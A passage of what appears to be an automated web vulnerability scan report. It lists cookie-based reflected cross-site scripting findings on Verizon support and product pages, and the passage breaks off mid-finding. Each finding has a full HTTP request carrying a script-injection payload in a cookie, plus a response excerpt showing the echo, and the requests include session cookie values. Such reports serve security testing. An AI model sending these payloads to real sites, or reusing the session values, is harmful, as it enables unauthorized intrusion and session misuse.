The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload efb2c<script>alert(1)</script>d7c9c2d6cea was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=efb2c<script>alert(1)</script>d7c9c2d6cea; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:40 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> efb2c<script>alert(1)</script>d7c9c2d6cea</span>
...[SNIP]...

3.261. http://www22.verizon.com/residentialhelp/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 55f0d<script>alert(1)</script>c68ab98df45 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX55f0d<script>alert(1)</script>c68ab98df45; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175791
Expires: Sat, 20 Nov 2010 00:22:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:22:06 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX55f0d<script>alert(1)</script>c68ab98df45 </span>
...[SNIP]...

3.262. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload f9aa6<script>alert(1)</script>cdcfbe4067 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48782
Expires: Sat, 20 Nov 2010 02:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:51 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; expires=Sun, 20-Nov-2011 02:22:51 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:51 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong> f9aa6<script>alert(1)</script>cdcfbe4067</span>
...[SNIP]...

3.263. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload eab60<script>alert(1)</script>0a0f7cbd88c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXeab60<script>alert(1)</script>0a0f7cbd88c; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48783
Expires: Sat, 20 Nov 2010 02:22:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:49 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; expires=Sun, 20-Nov-2011 02:22:49 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:49 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong>, TXeab60<script>alert(1)</script>0a0f7cbd88c </span>
...[SNIP]...

3.264. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/DirecTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668a0'><script>alert(1)</script>fc8df7db051 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668a0'><script>alert(1)</script>fc8df7db051; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65384
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668a0'><script>alert(1)</script>fc8df7db051; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668A0'><SCRIPT>ALERT(1)</SCRIPT>FC8DF7DB051 ' />
...[SNIP]...

3.265. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 165a7'><script>alert(1)</script>638a1bf81ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX165a7'><script>alert(1)</script>638a1bf81ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 02:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX165a7'><script>alert(1)</script>638a1bf81ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX165A7'><SCRIPT>ALERT(1)</SCRIPT>638A1BF81ED ' />
...[SNIP]...

3.266. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

